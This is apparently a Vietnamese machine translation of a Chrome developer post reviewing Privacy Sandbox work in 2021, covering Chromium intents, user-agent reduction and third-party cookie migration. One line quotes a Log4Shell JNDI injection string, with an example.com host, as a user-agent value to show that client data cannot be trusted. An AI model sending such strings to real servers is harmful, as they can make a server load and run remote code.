Chào mừng bạn đến với bản tổng kết năm 2021 của dự án Progress in the Privacy Hộp cát, theo dõi các mốc quan trọng trên lộ trình ngừng sử dụng cookie của bên thứ ba trong Chrome và nỗ lực hướng tới web riêng tư. Thông thường, chúng tôi chia sẻ thông tin tổng quan về các bản cập nhật cho Hộp cát về quyền riêng tư dòng thời gian cùng với tin tức từ trên dự án này, nhưng tháng 12 lại là một tháng yên tĩnh. Thay vào đó, chúng ta sẽ xem lại một số các hoạt động trong năm 2021 và đưa ra một vài giải pháp tiềm năng mà bạn có thể thực hiện chúng ta đang trong năm mới.
Quá trình phát triển Chromium
Để một tính năng nền tảng web mới được đưa vào Chromium, tính năng đó phải trải qua quá trình phát triển mở của dự án . Năm 2021, Nhóm Hộp cát về quyền riêng tư đã tạo:
| 🥚 | Ý định để tạo nguyên mẫu | 19 |
| 🧪 | Có ý định thử nghiệm | 7 |
| 🚀 | Dự định giao hàng | 11 |
Mỗi cột mốc quan trọng cũng là một lời mời tham gia đóng góp của hệ sinh thái web rộng lớn hơn.
Ý định tạo nguyên mẫu là điểm kiểm tra đầu tiên nơi chúng tôi mời thảo luận và thử nghiệm ban đầu. Điều này có nghĩa là đề xuất sẽ có trên GitHub, nơi bạn có thể đặt câu hỏi bằng cách tạo một Vấn đề hoặc tham gia các cuộc thảo luận và bản trình bày theo tiêu chuẩn như W3C và IETF. Đây cũng là nơi quá trình lập trình bắt đầu, có nghĩa là bạn có thể mong đợi chức năng nguyên mẫu được cung cấp cho việc thử nghiệm của nhà phát triển sau tính năng cờ hiệu. Phản hồi ban đầu rất quan trọng trong việc xác thực và lặp lại các đề xuất.
Ý định thử nghiệm là một bước không bắt buộc nếu chúng tôi muốn yêu cầu một bản dùng thử theo nguyên gốc. Nhà phát triển có thể đăng ký nguồn gốc bản dùng thử một tính năng rồi kiểm thử tính năng đó trong phiên bản chính thức. Điều này được gọi là thử nghiệm vì chúng tôi có các khía cạnh cụ thể của tính năng mà chúng tôi muốn xác thực trong môi trường thực tế. Những nhà phát triển có thể thử nghiệm và chia sẻ kết quả của các thử nghiệm đó đưa ra ý kiến phản hồi có giá trị để giúp lặp lại và phát triển tính năng này.
Ý định gửi hàng là mốc cuối cùng cho biết rằng một tính năng hiện đã đã hoàn chỉnh và sẵn sàng để phát hành rộng rãi. Sau khi được phê duyệt, tính năng này sẽ được hợp nhất thành một bản phát hành sắp tới rồi tiến triển qua Canary, Beta, và Kênh chính thức. Điều quan trọng là bạn phải thử nghiệm trang web của mình bằng Canary và Các phiên bản Beta của Chrome để nắm bắt và báo cáo mọi lỗi trước khi một tính năng lên phiên bản Ổn định.
Đề xuất
Mỗi đề xuất trong Hộp cát về quyền riêng tư đều có một kho lưu trữ GitHub đi kèm. Đáp kho lưu trữ có một bản giải thích để tóm tắt chức năng tổng thể, một bản trình bày chi tiết đặc tả kỹ thuật triển khai theo trình duyệt và đóng góp từ nhiều hệ sinh thái web dưới dạng Vấn đề và Yêu cầu lấy dữ liệu.
Trên 14 kho lưu trữ Hộp cát về quyền riêng tư, chúng tôi có:
| 💬 | 545 | Đã tạo vấn đề |
| 250 | Đã đóng vấn đề | |
| 🛠️ | 261 | Đã tạo Yêu cầu kéo |
| 223 | Đã hợp nhất các yêu cầu lấy dữ liệu |
Ngôn từ trong thông tin giải thích và thông số kỹ thuật thường nhắm đến đối tượng vốn đã quen thuộc với các tiêu chuẩn và cách phát triển trình duyệt, mà có thể khó khăn nếu bạn chưa quen với ngôn ngữ này. Tuy nhiên, mục đích của thông báo giải thích là giải thích! Nếu có những điểm không rõ ràng hoặc không được đề cập, chúng tôi muốn bạn đưa ra vấn đề để chúng tôi có thể cập nhật và giải thích rõ hơn.
Độ phân giải
Vệ sinh lò xo tác nhân người dùng
Khi chúng tôi đếm xu sang Năm mới, chúng tôi cũng đang tính tăng cho cả hai Chrome 100 và giảm dần của chuỗi tác nhân người dùng. Đây là một điều hay động lực để xem lại bất kỳ việc sử dụng chuỗi tác nhân người dùng nào trong mã của bạn để kiểm tra xem nó chịu ảnh hưởng của một trong những thay đổi này.
Cách tìm những khu vực đó:
- Tìm kiếm
navigator.userAgenttrong mã JavaScript của bạn hoặc truy cập vào Tiêu đềUser-Agenttrong mã máy chủ của bạn. - Kiểm tra phân tích cú pháp chuỗi để biết các giả định về phiên bản 2 chữ số. Cho
ví dụ: biểu thức chính quy chỉ định
\d\dhoặc\d{2}sẽ được thay thế bằng\d+. - Kiểm tra việc bạn sử dụng chuỗi cho mọi vị trí mà bạn cần:
- phiên bản nền tảng (hệ điều hành)
- phiên bản bản dựng Chrome đầy đủ
- tên thiết bị di động
- Đây là những giá trị sẽ được giảm xuống thành chuỗi cố định trong tương lai. Nếu bạn cần quyền truy cập vào các giá trị này, hãy di chuyển sang User-Agent Client Gợi ý.
Sẽ có một bản cập nhật tháng 12 để đề cập đến—nếu bạn đang sử dụng Ứng dụng tác nhân người dùng
Gợi ý, chúng tôi đã gửi Intent to Ship để uỷ quyền gợi ý cho các bên khác
nguồn gốc của
HTML
thông qua thẻ <meta>. Ví dụ:
<meta name="accept-ch" content="sec-ch-ua-model=( https://foo.bar )">
Nếu đang háo hức dọn dẹp vào mùa xuân, bạn cũng có thể cân nhắc các lựa chọn thay thế hoàn toàn cho việc sử dụng tác nhân người dùng. Nếu bạn đang sử dụng chuỗi để phát hiện thiết bị di động, sau đó điều tra xem bạn có thể thay thế thiết bị này bằng thiết bị di động thích ứng không thiết kế của bạn. Nếu bạn đang kiểm tra tên và phiên bản trình duyệt để được hỗ trợ tính năng, hãy xem nếu bạn có thể dùng tính năng phát hiện tính năng.
Nên nhớ rằng tác nhân người dùng, giống như bất kỳ ứng dụng khách nào được cung cấp
không được đảm bảo là chính xác hoặc thậm chí không được cung cấp. API Log4j gần đây
lỗ hổng bảo mật "Log4shell"
đưa ra một ví dụ về rủi ro này. Một ứng dụng đặt chuỗi tác nhân người dùng thành
bao gồm một giá trị như ${jndi:ldap://example.com/file} có thể truy cập một trang web
để chủ động phân tích cú pháp mã đó trên máy chủ.
Lập danh mục cookie
Một hoạt động truyền thống khác trong năm mới là đảm bảo rằng bạn thấy vui vì
nhiều bánh quy lành mạnh có thành phần chất lượng. Khi chúng tôi tiếp tục di chuyển
trong quá trình loại bỏ cookie của bên thứ ba, bạn nên đảm bảo rằng mình
cookie nào của trang web sẽ bị ảnh hưởng. Năm 2020 là một khởi đầu thuận lợi vì
là cần thiết để đánh dấu tất cả các cookie cho nhiều trang web hoặc bên thứ ba
sử dụng
cùng với SameSite=None.
Mọi cookie mà bạn đã đặt thuộc tính SameSite thành None sẽ cần có
cập nhật.
Hiện tại, có 3 lộ trình mà bạn có thể cân nhắc sử dụng:
- Nếu cookie chỉ được yêu cầu trong mối quan hệ 1:1 với trang web cấp cao nhất,
thì theo dõi tiến trình của CHIPS
đề xuất. Điều này có nghĩa là việc thêm
Thuộc tính
Partitionedcho cookie. - Nếu cookie được sử dụng trong ngữ cảnh chéo trang web, nhưng chỉ trên các trang web mà bạn
sở hữu và điều hành, thì ứng dụng đó có thể là ứng cử viên cho Bên thứ nhất
Tập hợp. Điều này đòi hỏi việc xác định
các trang web trong tập hợp và thêm thuộc tính
SamePartyvào cookie. - Nếu cookie được dùng để cung cấp một dạng giá trị chung giữa nhiều các trang web khác, hãy điều tra tập hợp Hộp cát về quyền riêng tư rộng hơn đề xuất nào đó để có một giải pháp thay thế không dựa vào tính năng theo dõi trên nhiều trang web.
Nếu bạn đang đặc biệt quan tâm đến sức khoẻ thì đây cũng là thời điểm lý tưởng để xem lại toàn bộ hoạt động sử dụng cookie của bạn, vì chúng tôi có một công thức hay để cải thiện cả cookie của bên thứ nhất.
Phản hồi
Khi chúng tôi tiếp tục xuất bản các bản cập nhật hằng tháng này và tiến triển thông qua Hộp cát về quyền riêng tư nói chung, chúng tôi muốn đảm bảo rằng nhà phát triển nhận được thông tin và hỗ trợ mà họ cần. Hãy cho chúng tôi biết trên @ChromiumDev Twitter nếu có bất cứ điều gì chúng tôi có thể cải thiện trong loạt video này. Chúng tôi sẽ sử dụng thông tin bạn cung cấp để tiếp tục cải thiện định dạng này.
Hãy xem Câu hỏi thường gặp về Hộp cát về quyền riêng tư mà chúng tôi tiếp tục mở rộng dựa trên các vấn đề bạn gửi đến bộ phận hỗ trợ nhà phát triển kho lưu trữ. Nếu bạn có bất kỳ câu hỏi nào về việc thử nghiệm hoặc triển khai bất kỳ đề xuất nào, đến trò chuyện với chúng tôi tại đó.